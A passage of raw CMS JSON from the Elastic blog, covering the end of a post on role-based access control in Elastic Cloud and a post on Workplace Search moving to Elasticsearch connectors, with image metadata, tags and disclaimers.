read-only access. The viewer role applies to one or more deployments.\u003c/span\u003e\u003c/li\u003e\u003c/ul\u003e"},{"title_l10n":"How to manage roles in Elastic Cloud","_metadata":{"uid":"cs0678a8ca408d878c"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eTo get started, go to your avatar in the upper right corner of the Cloud console, and choose \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eOrganization\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e to open the Organization management page.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eFrom the Members tab, you can manage roles for users, and you can edit the roles of API keys from the API Keys tab. Select the user/API key you want to edit, or click \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eEdit\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e under Actions to open the role management page:\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cse857d3b1e421567b"}}},{"image":{"image":{"_version":1,"is_dir":false,"uid":"blt0753487866bf60e0","ACL":{},"content_type":"image/png","created_at":"2023-09-13T14:31:53.721Z","created_by":"bltb6c155cd84fc0c1a","file_size":"181780","filename":"rbac-jane-doe.png","parent_uid":null,"tags":[],"title":"rbac-jane-doe.png","updated_at":"2023-09-13T14:31:53.721Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-09-18T14:00:00.416Z","user":"bltb6c155cd84fc0c1a"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt0753487866bf60e0/6501c7d9b8c6d64c810e5eeb/rbac-jane-doe.png"},"_metadata":{"uid":"csffefc7926ca5d556"},"caption_l10n":"","alt_text_l10n":"jane doe","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs7d1c51699041af5b"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eSelect the appropriate roles for the user/API key and click \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eSave\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e. Changes will take effect immediately.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Learn more","_metadata":{"uid":"cs36fdb869d16cad04"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eYou can learn more about Elastic Cloud RBAC in the \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/cloud/current/ec-organizations.html\"\u003e\u003cspan style='font-size: 12pt;'\u003eproduct documentation\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e. If you are ready to assign roles, you can log in to your Elastic deployment, navigate to the Organization page, select your users or API Keys, and manage their roles.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csc814e62f10e855b4"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs0d1e7a31b5456fa4"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eThe release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs8d5996208eebd52d"}}}],"publish_date":"2023-09-18","sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[{"_version":1,"locale":"en-us","uid":"bltc3067ddccda555c1","ACL":{},"created_at":"2023-11-06T21:50:08.806Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"elastic-cloud","label_l10n":"Elastic Cloud","tags":[],"title":"Elastic Cloud","updated_at":"2023-11-06T21:50:08.806Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.096Z","user":"blt4b2e1169881270a8"}},{"_version":3,"locale":"en-us","uid":"blta3fd0168b354a680","ACL":{},"created_at":"2023-11-06T21:50:30.740Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"elk-elastic-stack","label_l10n":"ELK/Elastic Stack","tags":[],"title":"ELK/Elastic Stack","updated_at":"2024-03-12T21:21:08.589Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-03-12T21:21:14.279Z","user":"blt3044324473ef223b70bc674c"}}],"tags_industry":[],"tags_partner":[],"tags_topic":[{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt2d51fc8cada40465","ACL":{},"created_at":"2023-11-06T20:35:57.040Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"cloud-security","label_l10n":"Cloud security","tags":[],"title":"Cloud security","updated_at":"2023-11-06T20:35:57.040Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:33:19.295Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt9149a5fda79fd708","ACL":{},"created_at":"2023-11-06T20:37:49.356Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"deployment","label_l10n":"Deployment","tags":[],"title":"Deployment","updated_at":"2023-11-06T20:37:49.356Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:33:19.169Z","user":"blt4b2e1169881270a8"}}],"tags_use_case":[{"_version":2,"locale":"en-us","uid":"bltcb543cd010a1e2a8","ACL":{},"created_at":"2020-06-17T03:33:30.831Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"cloud","label_l10n":"Cloud","tags":[],"title":"Cloud","updated_at":"2020-07-06T22:20:17.019Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:05:21.552Z","user":"blt4b2e1169881270a8"}},{"_version":2,"locale":"en-us","uid":"blt569b48df66a9ba5d","ACL":{},"created_at":"2020-06-17T03:30:49.259Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"security","label_l10n":"Security","tags":[],"title":"Security","updated_at":"2020-07-06T22:20:03.211Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:19.430Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"_version":1,"is_dir":false,"uid":"blt2fc6a4e3bce57768","ACL":{},"content_type":"image/png","created_at":"2023-09-13T14:27:37.490Z","created_by":"bltb6c155cd84fc0c1a","file_size":"78909","filename":"rbac-header.png","parent_uid":null,"tags":[],"title":"rbac-header.png","updated_at":"2023-09-13T14:27:37.490Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-09-18T14:00:00.417Z","user":"bltb6c155cd84fc0c1a"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt2fc6a4e3bce57768/6501c6d9539fa12ce24aef86/rbac-header.png"},"title":"Leveling up Elastic Cloud security: Introduction to role-based access control","title_l10n":"Leveling up Elastic Cloud security: Introduction to role-based access control","updated_at":"2024-12-06T15:51:28.435Z","updated_by":"blt3e52848e0cb3c394","url":"/blog/elastic-cloud-security-role-based-access-control-rbac","publish_details":{"time":"2024-12-06T15:51:32.814Z","user":"blt3e52848e0cb3c394","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt50c5ed17c11b3a6d","_version":9,"locale":"en-us","ACL":{},"abstract_l10n":"Workplace Search functionality will merge with Elastic Search in the future. Here’s what you need to know.","author":["bltaba7528fc0024e91","blt672adbf9c87583dc"],"category":[],"created_at":"2023-11-10T18:07:04.173Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csf93fad3bcfd14c03"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eRecent advancements in generative AI technologies have opened up a wave of possibilities with search. As developers build new experiences, users are adopting new ways of using search — from search queries written in natural language, to searching by uploading images or voice samples. At Elastic®, we have been heads-down to make sure Elasticsearch® has the right machine learning tools developers need to build modern search.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAs we continue on this journey, we want to share some developments about Workplace Search:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cspan style='font-size: 12pt;'\u003eElasticsearch is the recommended tool to build search experiences for internal knowledge search use cases going forward.\u003c/span\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style='font-size: 12pt;'\u003eThe standalone \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/workplace-search/current/index.html\"\u003e\u003cspan style='font-size: 12pt;'\u003eWorkplace Search\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e product will continue to be supported in its current form. New features will be added to Elasticsearch, Workplace Search will receive security upgrades and fixes.\u003c/span\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIf you are working with the standalone Workplace Search product \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003eor\u003c/em\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e are interested in building search experiences for workplace search use cases, this blog includes important information for you.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Historical context","_metadata":{"uid":"cs3c8afb96b3e3ceba"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe standalone Workplace Search product became part of our offering when Swiftype \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/swiftype-joins-forces-with-elastic\"\u003e\u003cspan style='font-size: 12pt;'\u003ejoined forces\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e with Elastic in 2017. Since then, we have added a number of content sources to popular databases, file systems, and other tools to Workplace Search. While users loved that Workplace Search included integrations for various data sources, there was clear feedback that developers wanted the transparency and flexibility to tune the search experience. These tools for tuning were only available when working directly with the Elasticsearch platform.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eInternal knowledge search use cases (i.e., being able to search all your private content sources—databases, knowledge bases, file systems, collaboration, or ticketing tools) have increased in\u0026nbsp; importance to our users with the recent popularity of ChatGPT and generative AI technologies. There is no doubt that search retrieval for private data and LLMs are better \u003c/span\u003e\u003ca href=\"https://www.elastic.co/search-labs/chatgpt-elasticsearch-openai-meets-private-data\"\u003e\u003cspan style='font-size: 12pt;'\u003etogether\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Elasticsearch connectors are the future","_metadata":{"uid":"cs2c254a1f1c3e7877"},"header_style":"H2","paragraph_l10n":""},{"title_l10n":"Customers love using Workplace Search content sources","_metadata":{"uid":"csc7667d0a31012298"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eCustomers that used the Workplace Search product loved the simplicity of ingesting data through content sources, using the indexed data in search experiences, and managing data and searches with built-in tools. These features are not going away but will evolve as part of our Elastic Search offering — some of this work began in early 8.x releases. Content sources have been replaced and elevated by \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/enterprise-search/current/connectors.html\"\u003e\u003cspan style='font-size: 12pt;'\u003econnectors\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e as a type of \u003c/span\u003e\u003ca href=\"https://www.elastic.co/integrations/data-integrations\"\u003e\u003cspan style='font-size: 12pt;'\u003eElastic integration\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e. These connectors write directly to search optimized Elasticsearch indices, instead of working with abstractions that use hidden indices. By doing so, the ability to utilize platform capabilities like integrating with third party transformer models to transform the indexed data is intuitive and easy to configure. As a result, setting up search experiences is more flexible than ever, and Elasticsearch native features provide multiple means of data and search management.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Typical deployment of Elastic connectors","_metadata":{"uid":"csd9665c17ecc805db"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe most \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/enterprise-search/8.11/connectors.html#connectors-overview-architecture\"\u003e\u003cspan style='font-size: 12pt;'\u003ecommon architecture\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e for internal knowledge search use cases involves bringing private organizational data into Elastic through native connectors and/or self-managed connector clients. Then, a self-managed search application exposes data that your end users are authorized to see through a search experience.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csa9c1f4bb665b6813"}}},{"image":{"image":{"uid":"blt9d6395356e38fdba","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2023-11-10T18:10:21.725Z","created_by":"bltb6c155cd84fc0c1a","file_size":"106376","filename":"hybrid-evolution.png","parent_uid":null,"tags":[],"title":"hybrid-evolution.png","updated_at":"2023-11-10T18:10:21.725Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2023-11-14T14:00:00.323Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt9d6395356e38fdba/654e720d647c2827dc4e732b/hybrid-evolution.png"},"_metadata":{"uid":"csbcea4c4ce5d1be83"},"caption_l10n":"","alt_text_l10n":"1 - hybrid","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":"width-large: 75%"}}},{"title_text":{"title_text":[{"title_l10n":"Two options: native connectors on Elastic Cloud, or self-hosted clients ","_metadata":{"uid":"cs027b9fa31b0082ab"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eConnectors are available directly within your Elastic Cloud deployment as \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/enterprise-search/current/connectors.html#connectors-native\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003enative connectors\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e, where no additional infrastructure is required. If you prefer to self-host a native connector, these are available as \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/enterprise-search/current/connectors.html#connectors-build\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003econnector clients\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e to be easily deployed and self-managed on your own infrastructure with no development required. For this, you can choose to run connectors \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/enterprise-search/current/build-connector.html#build-connector-service-source\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003efrom source\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e or \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/enterprise-search/current/build-connector.html#build-connector-service-docker\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003edeploy via Docker\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e. Connector clients are \u003c/span\u003e\u003ca href=\"https://github.com/elastic/connectors\" target=\"_blank\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eopen-code\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e and can be customized to satisfy your specific needs. What’s more, you can leverage our connector framework to \u003c/span\u003e\u003ca href=\"https://www.elastic.co/search-labs/blog/how-to-create-customized-connectors-for-elasticsearch\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003ecreate new connector clients\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e that integrate with your data sources that might not be covered by our current catalog.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Transform data to power your search ","_metadata":{"uid":"csfc4fb024ae260d11"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eSynchronized content is indexed to regular search optimized \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/what-is-an-elasticsearch-index\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eElasticsearch indices\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e that can be used directly in your search experience. By default, connector specific logic and the bundled \u003cspan data-type='inlineCode'\u003eent-search-generic-ingestion\u003c/span\u003e pipeline extract and transform your data, as configured in your deployment. For more advanced use cases, data can be filtered and transformed using tools like:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cspan style=\"font-size: 12pt;\"\u003eBasic sync rules, which are identical for all connectors\u003c/span\u003e\u003c/li\u003e\u003cli\u003e\u003ca href=\"https://www.elastic.co/guide/en/enterprise-search/8.11/sync-rules.html#sync-rules-advanced\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eAdvanced sync rules\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e for remote filtering at the data source level\u003c/span\u003e\u003c/li\u003e\u003cli\u003e\u003ca href=\"https://www.elastic.co/guide/en/enterprise-search/current/connectors-content-extraction.html#connectors-content-extraction-local\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eSelf-managed Extraction Service\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e for connector clients\u003c/span\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style=\"font-size: 12pt;\"\u003eCustomized pipeline filtering, before persistence to Elasticsearch through ingest pipelines (Read about \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/8.11/ingest-pipeline-search.html\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eIngest pipelines in Search\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e for more details.)\u003c/span\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/8.10/ingest.html\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eIngest pipelines\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e are especially powerful as they provide an extremely accessible integration point for \u003c/span\u003e\u003ca href=\"https://www.elastic.co/search-labs/may-2023-launch-machine-learning-models\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eML models\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e such as ELSER, for any private data indexed through connectors.\u003c/span\u003e\u003c/li\u003e\u003c/ul\u003e"},{"title_l10n":"Building experiences with Elastic Search ","_metadata":{"uid":"cs4ecd3751f90303e1"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eOnce you have your data in Elasticsearch, you can build your own custom search experience with projects like \u003c/span\u003e\u003ca href=\"https://docs.elastic.co/search-ui/tutorials/elasticsearch\"\u003e\u003cspan style='font-size: 12pt;'\u003eSearch UI\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e and \u003c/span\u003e\u003ca href=\"https://www.searchkit.co/\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eSearchKit\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e for frontend components. Our internal knowledge search \u003c/span\u003e\u003ca href=\"https://github.com/elastic/elasticsearch-labs/tree/main/example-apps/internal-knowledge-search\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eexample app\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e shows how you can use existing tools to get started.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe Javascript client library enables you to easily build or integrate search into your web applications, or use one of the many \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/client/index.html\"\u003e\u003cspan style='font-size: 12pt;'\u003eElasticsearch client libraries\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWe're rapidly adding features to make search more powerful. Building your internal search systems with Elasticsearch gives you access to these capabilities as soon as they're released.\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cspan style='font-size: 12pt;'\u003eElasticsearch supports vector, semantic, hybrid, and generative AI search use cases. Check out some of our \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/semantic-search.html\"\u003e\u003cspan style='font-size: 12pt;'\u003esemantic and vector search capabilities\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e, including a powerful \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/semantic-search-elser.html\"\u003e\u003cspan style='font-size: 12pt;'\u003eout-of-the box sparse-vector model\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e. In 8.11 this model is generally available and within a few clicks can be applied to data written using the Elastic connectors or web crawler.\u0026nbsp;\u003c/span\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style='font-size: 12pt;'\u003eWith a fully customizable \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/enterprise-search/current/search-applications.html\"\u003e\u003cspan style='font-size: 12pt;'\u003eSearch Application API\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e based on search templates, this new API abstracts away the learning curve of the Elasticsearch Query DSL, if that is required for your use case. You can dive into the details at any time with the Query DSL.\u003c/span\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style='font-size: 12pt;'\u003eNew search management tools let you directly \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/search-using-query-rules.html\"\u003e\u003cspan style='font-size: 12pt;'\u003emanage the results of specific queries\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e, for example boost or bury results and work programmatically with the \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/synonyms-apis.html\"\u003e\u003cspan style='font-size: 12pt;'\u003esynonyms management API\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/li\u003e\u003c/ul\u003e"},{"title_l10n":"Workplace Search product and workplace search use case","_metadata":{"uid":"cs7da6dc2d83ee64a3"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe standalone Workplace Search product will continue to be a supported experience, so while migrating to the new features is recommended, it is not a requirement. Any user looking to elevate their internal knowledge search to include semantic search, vector search or chat prompt based experiences, would benefit from transitioning to use Elastic connectors. There are many compelling advancements for the range of workplace search use cases in the enterprise, supported by Elastic Search. Now would be a great time to think about upgrading your internal knowledge search to make it an amazing experience for your users!\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs84ab97250f347d09"}}},{"callout":{"title_l10n":"Resources for you","_metadata":{"uid":"cs4a749af17f4e43dd"},"paragraph_l10n":"\u003cul\u003e\u003cli\u003e\u003ca href=\"https://github.com/elastic/elasticsearch-labs/tree/main/example-apps/internal-knowledge-search\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eExample app\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e to build a search experience for your internal knowledge sources\u0026nbsp;\u003c/span\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style='font-size: 12pt;'\u003eElastic Search and Workplace Search feature comparison (see \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/workplace-search/8.11/index.html#table-ws-vs-es\"\u003e\u003cspan style='font-size: 12pt;'\u003etable\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e in our docs)\u003c/span\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style='font-size: 12pt;'\u003eNEW! Search Labs has code notebooks, engineering \u003c/span\u003e\u003ca href=\"https://www.elastic.co/search-labs\"\u003e\u003cspan style='font-size: 12pt;'\u003eblogs\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e, and sample projects on \u003c/span\u003e\u003ca href=\"https://github.com/elastic/elasticsearch-labs\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eGitHub\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003e.\u003c/em\u003e\u003c/span\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style='font-size: 12pt;'\u003eDid you know that Elasticsearch is a \u003c/span\u003e\u003ca href=\"https://www.elastic.co/elasticsearch/vector-database\"\u003e\u003cspan style='font-size: 12pt;'\u003evector database superset\u003c/span\u003e\u003c/a\u003e\u003cspan style='color:rgb(52, 55, 65);font-size: 12pt;'\u003e?\u003c/span\u003e\u003c/li\u003e\u003c/ul\u003e","callout_reference":[],"callout_type":"Information (info)"}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs822d5554229c50c0"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='color:rgb(52, 55, 65);font-size: 10pt;'\u003e\u003cem\u003eThe release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='color:rgb(52, 55, 65);font-size: 10pt;'\u003e\u003cem\u003eIn this blog post, we may have used or referred to third party generative AI tools, which are owned and operated by their respective owners. Elastic does not have any control over the third party tools and we have no responsibility or liability for their content, operation or use, nor for any loss or damage that may arise from your use of such tools. Please exercise caution when using AI tools with personal, sensitive or confidential information. Any data you submit may be used for AI training or other purposes. There is no guarantee that information you provide will be kept secure or confidential. You should familiarize yourself with the privacy practices and terms of use of any generative AI tools prior to use.\u0026nbsp;\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='color:rgb(52, 55, 65);font-size: 10pt;'\u003e\u003cem\u003eElastic, Elasticsearch, ESRE, Elasticsearch Relevance Engine and associated marks are trademarks, logos or registered trademarks of Elasticsearch N.V. in the United States and other countries. All other company and product names are trademarks, logos or registered trademarks of their respective owners.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs5447e15715209f28"}}}],"publish_date":"2023-11-14","sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"Workplace Search functionality will merge with Elastic Search in the future. Here’s what you need to know.","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[],"tags_industry":[],"tags_partner":[],"tags_topic":[{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt99b075caf3df4ca7","ACL":{},"created_at":"2023-11-06T21:41:39.171Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"generative-ai","label_l10n":"Generative AI","tags":[],"title":"Generative AI","updated_at":"2023-11-06T21:41:39.171Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.390Z","user":"blt4b2e1169881270a8"}}],"tags_use_case":[{"_version":3,"locale":"en-us","uid":"blt10eb11313dc454f1","ACL":{},"created_at":"2020-06-17T03:30:26.497Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"enterprise-search","label_l10n":"Search","tags":[],"title":"Search","updated_at":"2023-07-19T16:04:51.718Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.232Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"uid":"blt13833c6cefd4146a","_version":1,"created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2023-11-14T16:09:28.067Z","updated_at":"2023-11-14T16:09:28.067Z","content_type":"image/jpeg","file_size":"157531","filename":"133192_-_Blog_header_image_Take_control_of_your_spend_with_data_(1)_V1.jpg","title":"133192_-_Blog_header_image_Take_control_of_your_spend_with_data_(1)_V1.jpg","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2023-11-14T16:09:50.323Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt13833c6cefd4146a/65539bb88c5bd62179c99194/133192_-_Blog_header_image_Take_control_of_your_spend_with_data_(1)_V1.jpg"},"title":"Evolution of Workplace Search: Search your private data with Elasticsearch","title_l10n":"Evolution of Workplace Search: Search your private data with 